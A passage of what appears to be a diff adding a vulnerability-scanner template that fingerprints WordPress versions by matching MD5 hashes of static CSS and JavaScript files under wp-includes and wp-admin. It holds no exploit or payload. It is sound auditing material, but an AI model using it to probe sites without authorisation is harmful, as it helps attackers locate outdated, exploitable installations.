"(\"480a9683a87eb320d33d5f6030ead6f6\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"7b77a3b55888f6e3c119b109b126c2c6\" == md5(body))" + - type: dsl + name: 4.6.6 - 4.6.20 + dsl: + - "(\"dc2f9ffa2e47f163b61f994d26b607dd\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.5 + dsl: + - "(\"fb342aec4e7ffd378fcd56d24e48fa55\" == md5(body))" + - type: dsl + name: 4.5.9 - 4.5.23 + dsl: + - "(\"48e77700180d3c74e87c8e2667e0a162\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.8 + dsl: + - "(\"850a250103976d39529ed57222dbcd34\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.9 + dsl: + - "(\"4b23d9c61bb3fa987575100ca32d765f\" == md5(body))" + - type: dsl + name: 4.4.10 - 4.4.24 + dsl: + - "(\"6b321157c32a1ec554f086d26fb203ee\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.10 + dsl: + - "(\"eeb4314977b1d232ebf2e2e1cd6dd957\" == md5(body))" + - type: dsl + name: 4.3.11 - 4.3.25 + dsl: + - "(\"4f059a4db81d09861ce9bd243a698423\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.14 + dsl: + - "(\"022571e949f8dad95e4d3fdab24a3d2c\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"79c9c0056693f2eba1f6007ccc6fb20b\" == md5(body))" + - type: dsl + name: 4.2.15 - 4.2.29 + dsl: + - "(\"2953e98345a9b580825f4ae57b088c24\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"b1458f7c51adab170056fc1fc4c3a3ce\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"7a48c0dd8cf103ad532290fc5360e476\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"753e31324b05a56a92ee202abb3a1ba4\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"d3c97fe598e3d7b4551f653fc78d972f\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.7 + dsl: + - "(\"ad777cb3508a1846b816d600922c9c94\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"06a4eaec20bc68b7f434a5e66af39ba6\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.2 + dsl: + - "(\"3fba5bcb39a5b8e0aaf169f839647ad5\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: 
+ - "(\"a8bfc0c0b048264fff5bda068606648a\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"0865378b9026626b28d1da762422fded\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"275f7a92c4b1f21ee8e591094215f59e\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"327e78e6ea18ad8be485ea7a220af17c\" == md5(body))" + - type: dsl + name: 5.5.1 - 5.5.3 + dsl: + - "(\"fae4e9264f7c3db53c11d11b749c38f9\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"fba473f85640448e5032a63c6943591d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-library/style-rtl.css" + matchers: + - type: dsl + name: 5.0 - 5.0.2 + dsl: + - "(\"a81dcd1c7121e6ca6c426be55416cd81\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.1.8 + dsl: + - "(\"76adcd3fae217c56e6fc3ff97257a3b4\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"8ef50c71bf80199ba6d0a9ae9bd8ac2c\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.3 + dsl: + - "(\"69e6c58d114579fea139d1eeab95a5eb\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"5f2406cc7f7dbf1cc05cfae44634c1b7\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"ccfdbc7479353ab78da216a1cb083e60\" == md5(body))" + - type: dsl + name: 5.3.4 - 5.3.6 + dsl: + - "(\"6cf938315537e537a7b83f86d09083ff\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"19ca41d5b33c73e19f264c028750f123\" == md5(body))" + - type: dsl + name: 5.5.1 - 5.5.3 + dsl: + - "(\"c136ea8e406f08b753c50416de567eb5\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"5d4aaf71e0edba8f95c386cf5831ecef\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-library/style.css" + matchers: + - type: dsl + name: 5.0 - 5.0.2 + dsl: + - "(\"5373faf3d69572d540d9b0e4d5a9343c\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.1.8 + dsl: + - "(\"b57c9841759fb679653e42162a9218c7\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"74f58e58a0247899a4917cd031bbb397\" 
== md5(body))" + - type: dsl + name: 5.3 - 5.3.3 + dsl: + - "(\"3fc815e03f1ef5e45b0269fb20123c31\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"3e8f8e2f37e7201633a2723931f87a29\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"ff1e4526d778743bf4370b47ff17e7c7\" == md5(body))" + - type: dsl + name: 5.3.4 - 5.3.6 + dsl: + - "(\"f8b102ddba5cb08cc9cca1f8761edc68\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"fc32e04b5acd4855f58d42fd344de79b\" == md5(body))" + - type: dsl + name: 5.5.1 - 5.5.3 + dsl: + - "(\"7cd4ab00f28c67eba2e40c822e2d78e2\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"678243a79f6d4f83e43bd1b2a6d38663\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-library/style-rtl.min.css" + matchers: + - type: dsl + name: 5.0 - 5.0.2 + dsl: + - "(\"ebe296f540e98fd2da0bd0a097c65906\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"d853d590816c08875d95849875e42648\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"ec43179cc672af0703e82c88bb99ac8c\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"54fde402a07e30323a0a61020c057dd6\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.3 + dsl: + - "(\"6c98f8fd086dfd625b8bfa2ac52a4293\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"2d58da14018a029b6726b1126e3cd132\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"10060fca872ba094902c7c2369badce7\" == md5(body))" + - type: dsl + name: 5.3.4 - 5.3.6 + dsl: + - "(\"49ce7010cf79420acb259b206601a1c1\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"a55b1f009c61c3cca055b596da667ca1\" == md5(body))" + - type: dsl + name: 5.5.1 - 5.5.3 + dsl: + - "(\"a2ba9a25208655c6dd71f0cecda2ded9\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"8d2ab800a215a35a3a36c951cea4a8c9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-library/style.min.css" + matchers: + - type: dsl + name: 5.0 
- 5.0.2 + dsl: + - "(\"b9d4015ad4738655273de5ab3738e09e\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"eb1a96949e0ea0d08033d3f941bf1f3e\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"7a63f6bcae054a13315b6bf1d32dbcd4\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"375bd65d60ff3c8723fccc343afb1b9b\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.3 + dsl: + - "(\"9eeddc51b0b4a2580a959042d50f826e\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"cf20af40089bf919dc62a7abedc669e2\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"7d2051e6c59f3598b17877bf41637ec4\" == md5(body))" + - type: dsl + name: 5.3.4 - 5.3.6 + dsl: + - "(\"612b7ab9f699e968f5b3206ca16ee834\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"4c48b7dd10596a40acb74090e2230cbb\" == md5(body))" + - type: dsl + name: 5.5.1 - 5.5.3 + dsl: + - "(\"2e7e1d1c1d4d446a1b6b63295757d859\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"27f5295ccf3ad9e0e85dcac543630288\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/comment-reply.min.js" + matchers: + - type: dsl + name: 4.4 - 5.0.11 + dsl: + - "(\"56bc2726d829207bfa802f957aac0791\" == md5(body))" + - type: dsl + name: 3.8 - 4.3.25 + dsl: + - "(\"1b1e9d1d12fcc51a151e7e0688bc695f\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"82fe85cb67dbd02e20c183e43979f217\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"500ceaa723d95be311592bd902d6823e\" == md5(body))" + - type: dsl + name: 5.1 + dsl: + - "(\"59cba75479bafeebaa4d2e8a03459599\" == md5(body))" + - type: dsl + name: 5.1.1 - 5.2.9 + dsl: + - "(\"1d476ef0a02dea95add5d5e192d6c89a\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"0b6d9871863bb13b701f3b233cbf6609\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"b350b637bfb44baa409b39310cdea29a\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - 
"(\"d18b8b11a6c7f5b62e52651924ff52b8\" == md5(body))" + - type: dsl + name: 5.5.1 + dsl: + - "(\"69fcd9d534fec9b5d69fda83b5f9fdbb\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.6 + dsl: + - "(\"6d5632a96b45b575263b8ca1751babd7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/buttons.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"deafd03cf409217af66c37196f6d819e\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"247139eb61e43078fe91e3770545528e\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.3 + dsl: + - "(\"5e4b2f1d423c73e86cc870546a3843a3\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"d05ef55d8faf55ed6312a11f725ce401\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"1b5e990d2dfcf13cc8c583a92525f344\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"92489bf36e3759bf16fb38fb13a34d0e\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"c7d13152f031f1cc21fbe3975c3d50ac\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"c369daa6877b943e3cfd58f57229bd61\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"5ec6f016d5581ccf2fccfaab08682af7\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"3f5a45249163f428749e8071146991f3\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"a1bde984a0c1ddd244220da833cabeb1\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"9ab3023423d067560b9c9049096e2bc3\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"aee0f4d3fa25115fde88df47238509ee\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"87ba05ef0da13f82c90d2e6cff2be01f\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"662264582818feac14a7084254a5ef25\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.1 + dsl: + - "(\"427b65b12d7e0b8a278d6d2d57f920b2\" == md5(body))" + - type: dsl + name: 5.2.2 + dsl: + - "(\"85611437313930a438c2ae6c02471891\" 
== md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"030b661fe993d54e17ea592bcb19370f\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"a1a9694e3949832881055f9cc12c65c3\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.4.4 + dsl: + - "(\"7e528e095235c083a49611bdfa0cdf27\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"c4914187374db23dc287fc61050239ce\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/buttons-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"8224848470a669b2b0c314eb980ef194\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"4ad1a5e86b0ab2de7258fabc0a62b9ae\" == md5(body))" + - type: dsl + name: 4.4 - 4.7.3 + dsl: + - "(\"04203d21bcc20f3c309146e22db92332\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"bbb7feb905e67321f8f9fecdd391a30e\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"c0081aa47a02dc65a5081ddc3dca22db\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"1ee31e93b5f8424bc82b4e1e477e09e0\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"a3881585a04421965820bb64280358dc\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"64e9014d99e11a00ade285978cb2c4f8\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"2f4716ac8571b8887ab6ce14764075d9\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"435b5693ad907629c93126dcf63e28e5\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"92314c04b1ab4f91ce18aced65f218f2\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"b687c9b357655bebcb4f34d53b5402ca\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.1 + dsl: + - "(\"5c33ca68783705b515c1318d9c66cdca\" == md5(body))" + - type: dsl + name: 5.2.2 + dsl: + - "(\"77f659ffd07e0276985e68447b3bb34b\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"1af281cfbde9fe8b5790ca9d4e7b9445\" == md5(body))" + - type: dsl + 
name: 5.3 + dsl: + - "(\"a290e445d2016584e513b23bf3537afe\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.4.4 + dsl: + - "(\"14e17b025e68cf83f453b0cf43b0d0c1\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"62b08b173b8361ef8443e18a062c2cf2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/buttons.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"789fe5df985c5f6d1944edc86e54f55b\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"74ac6750d8faed75774166c72f88fcbf\" == md5(body))" + - type: dsl + name: 4.4 - 4.7.3 + dsl: + - "(\"fa03516663b10fb9654af4e680ccc42b\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"650111cdcaee6c61ba5d238448345b2c\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"494016bf330d1bd60723efcedbf8b3ef\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"52dc838032e91584a03c7aa660c860c7\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"6b03c4aff48876c047aa6724b93e923d\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"e82337ca2dcf3e0e43643e9912caabb3\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"47b1080fc3e5f6630771c5844dc342ec\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"da093d1bd20e5e366150d97118a39ae4\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"9047fdac8c32de54996c846d8979f186\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"24fbae22f91ed2955d47b47f5b556935\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"8b2bbab9de38118eff72be3474a6f66e\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"fafd866f7348fabb63d426137bbebda3\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.1 + dsl: + - "(\"899eaedb5b1be5a3cd2a6f0d76577c96\" == md5(body))" + - type: dsl + name: 5.2.2 + dsl: + - "(\"c9ecff278d15daf101f6a98d1795d65f\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - 
"(\"367df0e4a603dc2f2cd56fb8514e5d18\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"51e44535b6838661cb2efc5ec5aa1b47\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.4.4 + dsl: + - "(\"3db7da28d89e8eaa2ae459c5adf59a92\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"001ad841b7c73640d4b62e2b4ff532a2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/media-editor.min.js" + matchers: + - type: dsl + name: 4.7 - 5.2.9 + dsl: + - "(\"79cf51bae2593b7ac27b73789e43646d\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"e87a3047979eb6fca4240efe0375a64b\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.23 + dsl: + - "(\"a5595167924936ae192d5f968c90abfa\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"725a37e46661f84f85a5602e6cc33d02\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"e284f524a66d2bd63a78dc948fc74416\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"4e4658d148abeeb3d2366b951a8c65b4\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"d764b49098afb4bf721bc23426d1f432\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"bf1676ffa9bb666fca90fc26f478ba69\" == md5(body))" + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"bb3a5f53c1a46e2ae27667e82c582f79\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"40ca295704665e94d0fd46847c6ba51b\" == md5(body))" + - type: dsl + name: 3.5.2 + dsl: + - "(\"6399f3e251f5dd1604e7936c1634e199\" == md5(body))" + - type: dsl + name: 3.5.1 + dsl: + - "(\"960a0adb54a1ffa9bf62719e7896de57\" == md5(body))" + - type: dsl + name: 3.5 + dsl: + - "(\"74d81f993bcb756db962338aa45a7f37\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"b4fb4087063ff50d81bedfb48d6ec5db\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"5ff7354aed9fd67985ac5da235c8ee64\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"3d02ff867901ae405f5a71300621b9df\" == 
md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/theme.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"b72da1b9065e2a265d6e8ee6f51607ab\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.19 + dsl: + - "(\"ecfb55ddd7b2f7340ee501195f636afb\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"5387070f8f034c0bcfcc1355eb42e767\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"12c4f466f2fac457f7bb4ddb5eba3be9\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"4435548198f28946ced9fedefd78d486\" == md5(body))" + - type: dsl + name: 4.4.3 - 4.4.24 + dsl: + - "(\"8edc3af2d0b4adaecf9a38b660814af3\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.2 + dsl: + - "(\"3715b37b10edab644542406f0caca236\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"a4c37789b8d4b09535f742dc44ddd7f1\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"ce08e4628996a70a5d5deac9221e1130\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"73a10d6e0f9198feeff1a5ef7f377f7f\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"a5027fd2f1f9732b8a7e873b4e04c209\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"27288c303cd0348b2189a31f28a86939\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"f5cecd61138f60a9b1048feff299ca8b\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"e3a25a3cb6290e46ba89b17a32c62f6c\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"a7f95c97f28986e4f7092dbc8678e9cf\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"ae76cc15f6fa1932e745d42c5fe26261\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"57d01c37c53a901c1a276b2e681df784\" == md5(body))" + - type: dsl + name: 3.1 - 3.3.3 + dsl: + - "(\"da9fa8f11020348651fd64858d4705bb\" == md5(body))" + - type: dsl + name: 4.9 + dsl: + - "(\"4dea99610abd3c166d4291d48039211d\" == md5(body))" + - type: dsl + name: 4.9.1 - 5.0.11 
+ dsl: + - "(\"7f52d864cd927714515906c74582e21b\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"76e43e1257cba406e30c224966dc2e5d\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"15c7a2d4f4cdac5a7ad33d2f66106258\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"0c2e021310bbd9bf031b4d3b42fe0377\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"e202e910a7087e7899160f89851b99fa\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/widgets.css" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"ef7ad4431fae07bceca3076e9762d135\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"d5aa95eb9b8a99353bb0bcd23e585035\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"53bfa004b8ec5ed07348b9ff3e79af55\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"85f24f95f8da242c164ca6de0610e184\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"e9bf39da5e8f7e35eb748389d838d709\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.3.25 + dsl: + - "(\"4aa8d8e3d5d42930d6c7788880431a86\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"4dc79b8deabc48edc3cb04b90633810d\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"ca4d97e656a62052423e53195ff42412\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"56f13b1bab3f517460dab5554e057056\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"8a9b28d7e969543624a0c3c22b1950f9\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"cdada849d89389820c2cb3e18c0a8765\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"da01dd4c0f6a2ef5d110cb4aa3cf394a\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"c4d1ad88ee2a59c096cee1ac30690056\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"0d6834ae4edcd6445a8426f7f6ec6c4e\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - 
"(\"6fb81427ceb258198deac5113ddcb498\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"d45da61a2c6ceb19f07c71aa48dae40a\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"74412c2868056ef2971bee2c271962a8\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"18eac3dce97d2b547263edbbb6d6eb37\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"cf21d93a0c7ef4b4fe265efefa82193f\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.16 + dsl: + - "(\"f3631c4a603a3cf7a8fb36e9d08d6435\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"bf91cac38229762201f530491ba2b604\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"16a2e4ba32a72d469fce4650878b2743\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"652fb07102f908931f36672e1477d233\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"2b91a746ea29f9a8ba3c2c0ce4c92259\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"8c91a8cfdae3032e7f39e0ba6e93b350\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"44852a3d288d9b8093aab51e4d397871\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/buttons-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"cf359b843c6624dffc39bc093f616237\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"e0e4ffc59213fcab73cd96ac94d0f002\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.3 + dsl: + - "(\"18cac60d5d31e37c3070817504c62af3\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"fd0faafb40ed3a5b818deb13eaf45ead\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"6370534afc150761f63d4b5447ce628c\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"440f128e2267419185ce47d2f8d0505c\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"313eace8c7cc0ef43a877a5e15c8f3bd\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - 
"(\"adf3b5ecfe050b4e66e2a0d08e944444\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"d24d1d1eb3a4b9a4998e4df1761f8b9e\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"fb062ed92b76638c161e80f4a5426586\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"71c13ab1693b45fb3d7712e540c4dfe0\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"4ec02ca83e210f35bbaf97fb4ed2a037\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"2f8b834d9d91275dbd682e1ea4dd38cd\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"850bd00d787bedbd6d8ea66ab464ec3e\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.1 + dsl: + - "(\"08dd5ea858d4a994978b75b00a4ded65\" == md5(body))" + - type: dsl + name: 5.2.2 + dsl: + - "(\"aba6fa8415824ee5f226b4631627dd1c\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"4238af66b73068824be148b4ce0473b9\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"87941cb9071bb1357623efed51881f18\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"543f7d2253e40f47dcfbf1a1468fc3e8\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"f9187bd63a056aad59c34bcfd6dfecd5\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"9224fae643e4a459dc42bd5417e966cc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/media-editor.js" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"4c69a1599bd6868a31cd43b7f899964d\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"5ec5214a027bf7e38370b75fe6d4b51a\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.23 + dsl: + - "(\"2ea5ca0b74bb2b7e36d2a3384ca51c4e\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - 